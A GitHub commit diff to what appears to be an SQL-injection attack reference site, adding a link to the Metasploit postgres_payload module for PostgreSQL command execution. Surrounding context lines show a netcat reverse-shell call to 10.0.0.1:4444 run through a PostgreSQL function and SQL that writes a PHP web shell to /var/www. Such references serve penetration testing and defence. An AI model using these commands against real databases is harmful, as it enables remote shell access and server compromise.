Skip to content

Commit dc0d9f6

Browse files
committed
Add metasploit module ref for postgresql cmd exec
1 parent 499f367 commit dc0d9f6

2 files changed

Lines changed: 14 additions & 2 deletions

File tree

attackQueries/executingOSCommands/postgresql.html

Lines changed: 13 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -81,7 +81,19 @@ <h3 id="executing-os-commands-through-sql-server">Executing OS Commands Through
8181
SELECT sys('nc -e /bin/sh 10.0.0.1 4444');
8282
<Br><Br>
8383

84-
Source: https://www.dionach.com/blog/postgresql-9x-remote-command-execution
84+
Source: https://www.dionach.com/blog/postgresql-9x-remote-command-execution
85+
</td>
86+
</tr>
87+
<tr >
88+
<td valign="top">
89+
<br><br>
90+
Metasploit postgres_payload Module<br>
91+
This can be used with direct connections.
92+
</td>
93+
<td valign="top">
94+
<br><br>
95+
https://www.rapid7.com/db/modules/exploit/linux/postgres/postgres_payload<br>
96+
exploit/linux/postgres/postgres_payload<br>
8597
</td>
8698
</tr>
8799
</tbody>

attackQueries/readingAndWritingFiles/postgresql.html

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -33,7 +33,7 @@ <h3 id="reading-and-writing-files">Reading and Writing Files</h3>
3333
CREATE TABLE mytable (mycol text);<br>
3434
INSERT INTO mytable(mycol) VALUES ('<? pasthru($_GET[cmd]); ?>');<br>
3535
COPY mytable (mycol) TO '/var/www/test.php';<br>
36-
</td>
36+
</td>
3737
</tr>
3838
</tbody>
3939
</table>

0 commit comments

Comments
 (0)